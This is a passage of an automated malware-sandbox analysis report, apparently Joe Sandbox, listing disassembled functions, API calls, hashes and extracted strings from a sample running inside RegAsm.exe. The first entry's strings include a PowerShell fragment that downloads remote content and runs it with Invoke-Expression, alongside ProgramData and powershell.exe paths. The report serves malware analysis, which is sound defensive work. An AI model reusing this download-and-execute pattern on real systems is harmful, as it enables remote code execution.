                                                                                                                                                                                                                                                                                                  • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 2215929589-186952963
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21535aa95325a0fafb9671f70929af331cdfd0dddaf6e9c4004634e5144dfcc8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 871f29370a4207a558a9410f1a869844a528fdaeb7b42278f87844e468f4e222
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21535aa95325a0fafb9671f70929af331cdfd0dddaf6e9c4004634e5144dfcc8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27D15E71815248EACB15EBE5C952BDDBBB86F25304F5040BEE50273692DF782B0CCBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C838ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FEB83
                                                                                                                                                                                                                                                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C83B392,?,?,00000001), ref: 6C8391F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                                                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                                                                                                  • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                                                                                                  • Opcode ID: 743e807946990a5bc4b17058af5f5bae3b25e7a8b5e5cd9c069439024d36765e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d02b6c84c1c5711862895413290bd13cd59113ae2bd966367e0612c34dd19b2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 743e807946990a5bc4b17058af5f5bae3b25e7a8b5e5cd9c069439024d36765e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDB11A70A011199BDB24CF99CA95BEEBBB6BF44308F505C29C415ABF80D731D949CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C81C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C81C5A3
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C81C9EA
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C81C9FB
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C81CA12
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C81CA2E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C81CAA5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                                                                  • String ID: (null)$0
                                                                                                                                                                                                                                                                                                  • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f801034c4272e5e690cb185e34db6890aa71a54bdfb862727efa617cf63c90c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7685d0bc4dd6a41737b063a451a32271ac12140619dff2ab90053e403cfedba8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f801034c4272e5e690cb185e34db6890aa71a54bdfb862727efa617cf63c90c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAA1913060D3829FDB21DF28C64475ABBE1AF89758F148D2DE899D7A42D731EC05CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3492
                                                                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34A9
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34EF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C7F350E
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C7F3522
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C7F3552
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F357C
                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3592
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                                  • Opcode ID: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
                                                                                                                                                                                                                                                                                                  • Instruction ID: c9520bf31992126ec0864cdd9f5aa2fa3a5d6f46aed89e0d90df8b6ffdb1e817
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18318171B001159BDF21DBB9CA8CAAE77B5FB96308F100439E515A3750F774A905CBB1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C85AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a4c3f86920f3ca8d8cba2d7d77850e7f243ef5972e2c33f7ce6d28b3f51bf7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21314CB19047048FDB51AF79D68C2AEBBF1BF85309F01493DE99587311EB709498CBA2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040BDB0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BDFF
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040BE15
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040BE46
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE66
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE77
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE7E
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE8E
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040BEBA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                                                                  • API String ID: 4020929367-2554083253
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5830c93ba15efab1a2f4bcd821ca1bcde63c08636075946b6d84bf1aff1a60ea
                                                                                                                                                                                                                                                                                                  • Instruction ID: dc70b8a88fbc265f9152f8d3d18cb141917d14296d8a68e17b5d0e509bf6abbe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5830c93ba15efab1a2f4bcd821ca1bcde63c08636075946b6d84bf1aff1a60ea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA31A676A002059FD710DFA9DC85BEE7BB9EB8D710F00416AE919E7381D7349901CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C809620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C809675
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809697
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8096E8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C809707
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80971F
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809773
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8097B7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097D0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097EB
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809824
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac3808ae54dc0b379eee78335fbcccf6214638902c1e7bfb206f3fb45f9a8fb2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3641c0736b577c0ccacafa0982ab6c71e7c3c534740d7f4a4f25b136e796dba8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac3808ae54dc0b379eee78335fbcccf6214638902c1e7bfb206f3fb45f9a8fb2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE419B717002519BDF318FAADA88A9A77B4EB8A369F104939ED1587740E734A804CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7F1EC1
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1EE1
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E744), ref: 6C7F1F38
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E744), ref: 6C7F1F5C
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C7F1F83
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FC0
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FE2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FF6
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7F2019
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                  • API String ID: 2055633661-2608361144
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3f22f9acea64eed5ebccc8a453c34a6c097ba7e3dc52c8622a82b67d191cb101
                                                                                                                                                                                                                                                                                                  • Instruction ID: aed6def7f1c315c8686552bb305edbd7898e95c0ea22db23788686731f6afe41
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f22f9acea64eed5ebccc8a453c34a6c097ba7e3dc52c8622a82b67d191cb101
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41C2B2B012258FEB218F68C98DBAE36B5EB4A34CF040435E91597745E7749805CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C807E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807EA7
                                                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C807EB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C80CB49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C80CBB6
                                                                                                                                                                                                                                                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C807EC4
                                                                                                                                                                                                                                                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C807F19
                                                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(?), ref: 6C807F36
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C807F4D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                  • API String ID: 204725295-2564639436
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ea3638682b82a581c994e78bae803db916b63ba072de91eda36036d672362a9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c357ea5c558629fd060c6aa3ab62839fe5cdb8bc128ac71b0003917c7ff3bba
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ea3638682b82a581c994e78bae803db916b63ba072de91eda36036d672362a9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2031D761E002989BDB219B69DD445FEB778EF9620CF049639DD495B612FB30A988C3E0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411A20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
